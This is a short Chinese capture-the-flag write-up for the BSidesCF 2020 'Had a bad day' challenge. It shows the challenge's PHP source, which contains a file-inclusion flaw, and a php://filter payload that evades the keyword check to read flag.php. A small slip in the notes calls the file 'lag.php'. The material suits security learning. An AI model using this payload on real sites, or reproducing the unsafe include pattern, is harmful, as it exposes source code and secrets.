[BSidesCF 2020]Had a bad day WP
这道题先用php://filter/convert.base64-encode/resource=index(这道题不带后缀名)读取出index.php的源码:
<?php $file = $_GET['category']; if(isset($file)) { if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){ include ($file . '.php'); } else{ echo "Sorry, we currently only support woofers and meowers."; } } ?> </div> <form action="index.php" method="get" id="choice"> <center><button onclick="document.getElementById('choice').submit();" name="category" value="woofers" class="mdl-button mdl-button--colored mdl-button--raised mdl-js-button mdl-js-ripple-effect" data-upgraded=",MaterialButton,MaterialRipple">Woofers<span class="mdl-button__ripple-container"><span class="mdl-ripple is-animating" style="width: 189.356px; height: 189.356px; transform: translate(-50%, -50%) translate(31px, 25px);"></span></span></button> <button onclick="document.getElementById('choice').submit();" name="category" value="meowers" class="mdl-button mdl-button--colored mdl-button--raised mdl-js-button mdl-js-ripple-effect" data-upgraded=",MaterialButton,MaterialRipple">Meowers<span class="mdl-button__ripple-container"><span class="mdl-ripple is-animating" style="width: 189.356px; height: 189.356px; transform: translate(-50%, -50%) translate(31px, 25px);"></span></span></button></center> </form>
strpos()函数的意思是查当前字符串第一次出现的位置,返回结果就是要查的字符串前面有几个字符。
很明显,这道题要求get传参里有woofers、meowers、index然后进行文件包含
重点是伪协议可以嵌套协议:/index.php?category=php://filter/convert.base64-encode/index/resource=flag
知识点:
1.strpos()函数返回要查询的字符串前面有几个字符
2.?file=php://filter/convert.base64-encode/resource=flag.php 在文件包含漏洞中,传参传这个就相当于传了要读取的文件名是lag.php
3.?file=php://filter/convert.base64-encode/resource=flag.php 在/convert.base64-encode/和/resource=flag.php之间可以添加任何字符,不影响,比如这道题传参必须有woofers、meowers、index,就把这三个里的任意一个传过去,就可以得到flag.php的文件内容base64编码后的值了